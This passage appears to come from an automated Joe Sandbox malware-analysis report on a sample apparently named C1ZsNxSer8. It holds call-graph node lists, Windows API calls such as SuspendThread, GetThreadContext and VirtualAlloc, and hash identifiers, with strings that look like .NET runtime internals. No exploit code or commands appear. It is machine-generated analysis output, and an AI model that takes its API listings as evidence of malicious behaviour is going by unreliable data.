16514->16513 16522 7ff774a05ea0 16514->16522 16516->16513 16517->16465 16519 7ff774a68fb0 8 API calls 16518->16519 16520 7ff774a0a6fa 16519->16520 16520->16467 16521->16470 16523 7ff774a05ec7 16522->16523 16524 7ff774a05ea7 16522->16524 16523->16514 16524->16523 16525 7ff774a0af22 LoadLibraryExW GetProcAddress 16524->16525 16533 7ff774a0af4e 16524->16533 16525->16533 16526 7ff774a0afaa SuspendThread 16527 7ff774a0aff8 16526->16527 16528 7ff774a0afb8 GetThreadContext 16526->16528 16531 7ff774a68fb0 8 API calls 16527->16531 16529 7ff774a0afef ResumeThread 16528->16529 16530 7ff774a0afd2 16528->16530 16529->16527 16530->16529 16532 7ff774a0b008 16531->16532 16532->16514 16533->16526 16533->16527 16534 7ff774a0af94 GetLastError 16533->16534 16534->16527 16535 7ff774a0af9f 16534->16535 16535->16526 16546 7ff774a2d0a0 16536->16546 16538 7ff774a2d2f6 DebugBreak 16543 7ff774a2d305 16538->16543 16539 7ff774a2d211 
16539->16538 16540 7ff774a2d2b9 DebugBreak 16539->16540 16541 7ff774a2d2d6 DebugBreak 16539->16541 16542 7ff774a2d328 16539->16542 16544 7ff774a2d2ed 16539->16544 16540->16539 16541->16539 16542->16475 16543->16542 16545 7ff774a2d319 DebugBreak 16543->16545 16544->16538 16544->16543 16545->16542 16549 7ff774a2d0c2 16546->16549 16547 7ff774a2d115 16557 7ff774a1d210 16547->16557 16549->16547 16550 7ff774a2d130 16549->16550 16552 7ff774a2e7a0 2 API calls 16550->16552 16551 7ff774a2d128 16553 7ff774a2d1e5 16551->16553 16564 7ff774a2f550 16551->16564 16556 7ff774a2d152 16552->16556 16553->16539 16555 7ff774a2d1a2 EnterCriticalSection LeaveCriticalSection 16555->16551 16556->16551 16556->16555 16558 7ff774a1d239 16557->16558 16558->16558 16560 7ff774a1d367 16558->16560 16583 7ff774a34c30 16558->16583 16561 7ff774a1d4ef 16560->16561 16562 7ff774a31660 9 API calls 16560->16562 16561->16551 16563 7ff774a1d516 16562->16563 16563->16551 16565 7ff774a2f569 16564->16565 16566 7ff774a2f605 16564->16566 16587 7ff774a23f10 16565->16587 16566->16553 16568 7ff774a2f5eb 16569 7ff774a26690 5 API calls 16568->16569 16571 7ff774a2f5f8 16569->16571 16571->16553 16572 7ff774a2f58c 16573 7ff774a2f5ce 16572->16573 16574 7ff774a2f591 16572->16574 16575 7ff774a26690 5 API calls 16573->16575 16576 7ff774a2f5b1 16574->16576 16577 7ff774a2f596 16574->16577 16578 7ff774a2f5de 16575->16578 16580 7ff774a26690 5 API calls 16576->16580 16593 7ff774a26690 16577->16593 16578->16553 16581 7ff774a2f5c1 16580->16581 16581->16553 16582 7ff774a2f5a4 16582->16553 16584 7ff774a34c49 16583->16584 16586 7ff774a34c94 16583->16586 16585 7ff774a2fae0 18 API calls 16584->16585 16584->16586 16585->16584 16586->16560 16588 7ff774a23f50 16587->16588 16591 7ff774a23fd4 16587->16591 16588->16591 16601 7ff774a23e10 16588->16601 16591->16566 16591->16568 16591->16572 16592 7ff774a23e10 7 API calls 16592->16591 16594 7ff774a266c7 16593->16594 16596 7ff774a266e9 _swprintf_c_l 16594->16596 16611 7ff774a40630 16594->16611 
16597 7ff774a267d0 16596->16597 16618 7ff774a129c0 VirtualFree 16596->16618 16597->16582 16599 7ff774a26795 16599->16597 16600 7ff774a267a3 EnterCriticalSection LeaveCriticalSection 16599->16600 16600->16597 16602 7ff774a23ea1 16601->16602 16603 7ff774a23e53 EnterCriticalSection 16601->16603 16604 7ff774a12930 3 API calls 16602->16604 16605 7ff774a23e7d LeaveCriticalSection 16603->16605 16606 7ff774a23e70 16603->16606 16607 7ff774a23eb2 16604->16607 16605->16602 16606->16605 16608 7ff774a23ee1 LeaveCriticalSection 16606->16608 16609 7ff774a23eed 16607->16609 16610 7ff774a23ec0 EnterCriticalSection 16607->16610 16608->16609 16609->16591 16609->16592 16610->16608 16619 7ff774a129c0 VirtualFree 16611->16619 16613 7ff774a4064a 16614 7ff774a40694 16613->16614 16615 7ff774a4065b EnterCriticalSection 16613->16615 16614->16596 16616 7ff774a4067e 16615->16616 16617 7ff774a40685 LeaveCriticalSection 16615->16617 16616->16617 16617->16614 16618->16599 16619->16613 16620->16503 16622 7ff774a68fb0 8 API calls 16621->16622 16623 7ff774a0a689 16622->16623 16623->16505 16624->16506 16174 7ff774a30750 16175 7ff774a3078d 16174->16175 16177 7ff774a307b7 16174->16177 16176 7ff774a12080 10 API calls 16175->16176 16176->16177

                            Control-flow Graph

                            APIs
                            • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A126BF
                            • GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A126FD
                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A12729
                            • GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A1273A
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A12749
                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A127E0
                            • GetProcessAffinityMask.KERNEL32 ref: 00007FF774A127F3
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                            • String ID:
                            • API String ID: 580471860-0
                            • Opcode ID: 19b53f92ddd9a9a7ef10cbccfe69bfe921807fcdb46f8766bab15c0bbd7aa85f
                            • Instruction ID: 0bb792ed4c30f35c7c4c27b288fbc5cf3876677fb59f7f72650bee6cede3d371
                            • Opcode Fuzzy Hash: 19b53f92ddd9a9a7ef10cbccfe69bfe921807fcdb46f8766bab15c0bbd7aa85f
                            • Instruction Fuzzy Hash: 9B517A73A3874AC6EA40AF1AA980579A3B2FF44B84FD54436DA4D97364EF3CE405C721

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00007FF774A0B020: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF774A0576B), ref: 00007FF774A0B02B
                              • Part of subcall function 00007FF774A0B020: QueryInformationJobObject.KERNEL32 ref: 00007FF774A0B0FE
                              • Part of subcall function 00007FF774A0AEC0: GetModuleHandleExW.KERNEL32(?,?,?,?,00007FF774A03819), ref: 00007FF774A0AED1
                            • RtlAddVectoredExceptionHandler.NTDLL ref: 00007FF774A057D8
                              • Part of subcall function 00007FF774A0D7B0: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF774A0D8AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: AllocExceptionHandleHandlerInformationModuleObjectQueryVectored_wcsicmp
                            • String ID: StressLogLevel$TotalStressLogSize
                            • API String ID: 2876344857-4058818204
                            • Opcode ID: b8dcc97092589a3276693584986118e267024c8b20105f4c83ed43bccf9c10d3
                            • Instruction ID: 907043b2742b4937d00df016478de8114d91767bf892ccf95e0ef73d8ce74a49
                            • Opcode Fuzzy Hash: b8dcc97092589a3276693584986118e267024c8b20105f4c83ed43bccf9c10d3
                            • Instruction Fuzzy Hash: 6C417133D38742C1EA10FF329085AB5A791AF41748FA64431EE4D176A6EE6CE509C760

                            Control-flow Graph

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: GlobalMemoryProcessQueryStatus$CurrentFrequencyInformationObjectPerformance
                            • String ID: Creation of WaitForGCEvent failed$TraceGC is not turned on
                            • API String ID: 133006248-518909315
                            • Opcode ID: a883baec98bf013cbae05903c849c0ebf41d363100fd1e29f5bb9a2db04b5c56
                            • Instruction ID: 4dffdb5017d4d901db1446dfabca2f3593813e4c499bb02eb64a38c77e120029
                            • Opcode Fuzzy Hash: a883baec98bf013cbae05903c849c0ebf41d363100fd1e29f5bb9a2db04b5c56
                            • Instruction Fuzzy Hash: 3102A563E3D703D2FA14BF13A4D0A74A2B9AF46784FA98936D90E47391DE2DB441C361
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID: XTk
                            • API String ID: 0-2572781210
                            • Opcode ID: 749d82c22d62133ff419bc4689e0a81499e8b71b87ee6e466b5f5fa1dfb16764
                            • Instruction ID: 73e586422a9a4df9cc7ffb3ae601eb9a0381c65f40384c146ff92d48581e5995
                            • Opcode Fuzzy Hash: 749d82c22d62133ff419bc4689e0a81499e8b71b87ee6e466b5f5fa1dfb16764
                            • Instruction Fuzzy Hash: E562E263A38646D6EA15AF27A5C0B35F791BF85784FA1C236D90E63251EF3CE840D620
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: CurrentProcess
                            • String ID:
                            • API String ID: 2050909247-0
                            • Opcode ID: 4b9e56fa8bd82e0999566641afb8b49dffdbdbc37bb6260533037af069611866
                            • Instruction ID: eb1fd7f0b3706550a2e31619d86982a4afcd53fb473a46f180d6e3d60ebd28b4
                            • Opcode Fuzzy Hash: 4b9e56fa8bd82e0999566641afb8b49dffdbdbc37bb6260533037af069611866
                            • Instruction Fuzzy Hash: FD029063E3D606D6FA15AF27A4C0A39F7D1AF45788FA98637C40D52268EF3DB4408621
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 63be20e83a5dc59e06a2b4a488b109fcff4d4b7f40a7f9cd1f9333ad3b6f2b2f
                            • Instruction ID: e8b9643512612e3f85ccc0973a7d3bf3cdd8492c50779f242e9cdcfe54ee7a65
                            • Opcode Fuzzy Hash: 63be20e83a5dc59e06a2b4a488b109fcff4d4b7f40a7f9cd1f9333ad3b6f2b2f
                            • Instruction Fuzzy Hash: F9F19023D3DA43D1F601FF27A9C1675E2A16F96388FD58777E40D222A1EF6C70919221

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                            • String ID: @$@$@
                            • API String ID: 2645093340-1177533131
                            • Opcode ID: ca88b2e47b65645c36c042b4dc4072e1c75f948b70b361a8b6e96ed663280510
                            • Instruction ID: d95175de3c3dbf782afd3eb28445d91e10f24764c6a56981a691ac8b2bd6dc13
                            • Opcode Fuzzy Hash: ca88b2e47b65645c36c042b4dc4072e1c75f948b70b361a8b6e96ed663280510
                            • Instruction Fuzzy Hash: 82512C33629AC1C5EB619F16E8807AAB3B0FB88B54F944535CA9D53B98CF3CD4458711

                            Control-flow Graph

                            APIs
                            • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF774A0576B), ref: 00007FF774A0B02B
                              • Part of subcall function 00007FF774A126B0: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A126BF
                              • Part of subcall function 00007FF774A126B0: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A126FD
                              • Part of subcall function 00007FF774A126B0: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A12729
                              • Part of subcall function 00007FF774A126B0: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A1273A
                              • Part of subcall function 00007FF774A126B0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A12749
                              • Part of subcall function 00007FF774A0D7B0: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF774A0D8AD
                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF774A0576B), ref: 00007FF774A0B09A
                            • GetProcessAffinityMask.KERNEL32 ref: 00007FF774A0B0AD
                            • QueryInformationJobObject.KERNEL32 ref: 00007FF774A0B0FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem_wcsicmp
                            • String ID: PROCESSOR_COUNT
                            • API String ID: 296690692-4048346908
                            • Opcode ID: f854a702a83dc01c41646339c6b0099762c4a12ee8e6a0d15d954c5e394c61ba
                            • Instruction ID: 199e6ff6efa508534f322dfca60b04f5b6ea1362b21d13e4663fb1d5416c55eb
                            • Opcode Fuzzy Hash: f854a702a83dc01c41646339c6b0099762c4a12ee8e6a0d15d954c5e394c61ba
                            • Instruction Fuzzy Hash: D0319D33A3C742C6EA14BFA2D9D47BDE3A1EF44354FE10031D69D426A5EE2CE8088720

                            Control-flow Graph

                            APIs
                            Strings
                            • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF774A06726
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: ExceptionFailFastRaise$Sleep
                            • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
                            • API String ID: 3706814929-926682358
                            • Opcode ID: 748c09927475cf9e349a911d070e2e85ba1b369a78d20386409e9d4058d69fe5
                            • Instruction ID: efe411ca03f2548ab94da37d7ffa9dae0ab1f3b323e80076f54c53cd7b991933
                            • Opcode Fuzzy Hash: 748c09927475cf9e349a911d070e2e85ba1b369a78d20386409e9d4058d69fe5
                            • Instruction Fuzzy Hash: F3417433A39B42D6EB95AF26E494779B390EB04B48F954036DA4D47360EF3DE450C361

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: Thread$ChangeCloseCreateFindNotificationPriorityResume
                            • String ID:
                            • API String ID: 2150560229-0
                            • Opcode ID: 43130a00a2952a497caba751cbab80e0c5945ae47426b9584871a3a1cc0fd745
                            • Instruction ID: 16bcfccd5f07b6d2f98375d2702a76d7383dbe36f194829f86f528123acfd753
                            • Opcode Fuzzy Hash: 43130a00a2952a497caba751cbab80e0c5945ae47426b9584871a3a1cc0fd745
                            • Instruction Fuzzy Hash: 67E039A6A3D702C2EB18EF22AC58335A350BF99B85F984434CE4E06370EF3C95858610

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: CurrentGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3261791682-2766056989
                            • Opcode ID: 9126c160c7f3f8a979c28d89de266492a2cb26c761d1c6b8a32731156d037bec
                            • Instruction ID: 9a7b33b95e87c7025994b1234e4b8acd39086935db11204dba3895ee9e1005d8
                            • Opcode Fuzzy Hash: 9126c160c7f3f8a979c28d89de266492a2cb26c761d1c6b8a32731156d037bec
                            • Instruction Fuzzy Hash: 3241E173A3AB46C1E956DE279190B39D2726F49BC0F698B31DA0E36744FF3CE4918610

                            Control-flow Graph

                            APIs
                            • EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF774A2DA29), ref: 00007FF774A40510
                            • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF774A2DA29), ref: 00007FF774A40586
                            • EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF774A2DA29), ref: 00007FF774A405DE
                            • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF774A2DA29), ref: 00007FF774A40604
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
                            • Opcode ID: 8596cd8b17cfc4c9012a95026411ea1fb58e51e4c51ec36a2e9fd3798af9f9b3
                            • Instruction ID: 1734f939a54b17ea8ee51dca101e58f7a11338e160198eb27d3bc344dea14ac0
                            • Opcode Fuzzy Hash: 8596cd8b17cfc4c9012a95026411ea1fb58e51e4c51ec36a2e9fd3798af9f9b3
                            • Instruction Fuzzy Hash: 6A414E63D3C606D1EA11BF1AE480B79A3B0FF5A344FEA8436D94D462A1DF6DE4419332

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: SwitchThread
                            • String ID:
                            • API String ID: 115865932-0
                            • Opcode ID: b53c1b8baf3fa961f42f9a93c026e3a91cc4469665a52e1080013d420c1a925c
                            • Instruction ID: 22b43d9be7ef45996d3fae904b0957393fd999873d4cd25897d88c3812f3b4a9
                            • Opcode Fuzzy Hash: b53c1b8baf3fa961f42f9a93c026e3a91cc4469665a52e1080013d420c1a925c
                            • Instruction Fuzzy Hash: A071EF23E3C203D6F654BF17A8C0E36A2B1AF40388FA54839D96E962D5DF3DF4418621

                            Control-flow Graph

                            APIs
                            • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF774A15348,?,?,0000000A,00007FF774A143A0,?,?,00000000,00007FF774A0EA91), ref: 00007FF774A12957
                            • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF774A15348,?,?,0000000A,00007FF774A143A0,?,?,00000000,00007FF774A0EA91), ref: 00007FF774A12977
                            • VirtualAllocExNuma.KERNEL32 ref: 00007FF774A12998
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: AllocVirtual$CurrentNumaProcess
                            • String ID:
                            • API String ID: 647533253-0
                            • Opcode ID: 686b3994b09b840201f1684b8296069bddec3b68bb7cd25d79b3609eb5cb6e8f
                            • Instruction ID: e7462fd6629f78d5e0493f7d52dbb69539e8a3cdfe559bb60a857f00b6b27a0c
                            • Opcode Fuzzy Hash: 686b3994b09b840201f1684b8296069bddec3b68bb7cd25d79b3609eb5cb6e8f
                            • Instruction Fuzzy Hash: 98F0A472B28691C2EB209F1AF440629A760BB49FC4F584134EF8C17B68CB3DC5918700

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: EventRegister
                            • String ID: gcConservative
                            • API String ID: 3840811365-1953527212
                            • Opcode ID: 0bd704104a13a76449dc93aebda2a80e695e757360b9318b75be9f098cee9c4f
                            • Instruction ID: c06a1a294763283e4632707ff310763a347a1a9c4056d27f0f425a9248cbacf1
                            • Opcode Fuzzy Hash: 0bd704104a13a76449dc93aebda2a80e695e757360b9318b75be9f098cee9c4f
                            • Instruction Fuzzy Hash: 0331F533A3A647E1EB00BF66E8C15A4A3A0EF48788F958436DA4D03261EF3DE555C771

                            Control-flow Graph

                            APIs
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF774A68FD9,?,?,?,?,00007FF774A0DBC1,?,?,?,00007FF774A0E13C,00000000,00000020,?), ref: 00007FF774A68EEE
                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF774A68F04
                              • Part of subcall function 00007FF774A69A2C: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF774A69A35
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
                            • String ID:
                            • API String ID: 205171174-0
                            • Opcode ID: b0e683634f6cf977cd568e859ab9fb6e1e75df7de34bcf169af656f9c50744c0
                            • Instruction ID: 480a66591c779d36bac86bd65c972cc06086c90fe4b130217827926a496351d5
                            • Opcode Fuzzy Hash: b0e683634f6cf977cd568e859ab9fb6e1e75df7de34bcf169af656f9c50744c0
                            • Instruction Fuzzy Hash: 66E0B602E3B107E1FD287D6754E59B580880F59778EBE1778D93D092C6AD1CE8958132

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: ChangeCloseCreateFindNotificationThread
                            • String ID:
                            • API String ID: 4060959955-0
                            • Opcode ID: 10e2c95deb48a9fa91c132fa6e8d2868e379d5a6b0bea3614ebc36bd565de11c
                            • Instruction ID: baa2ad425d5835dde14a48eaa7d44a361522a19a5ffc0213e49c0de3d7c35b25
                            • Opcode Fuzzy Hash: 10e2c95deb48a9fa91c132fa6e8d2868e379d5a6b0bea3614ebc36bd565de11c
                            • Instruction Fuzzy Hash: 43D0C2A2E2D741C2DB14EF722C0013567D0BF98B40FD14138D94D83330FE3C92018900
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
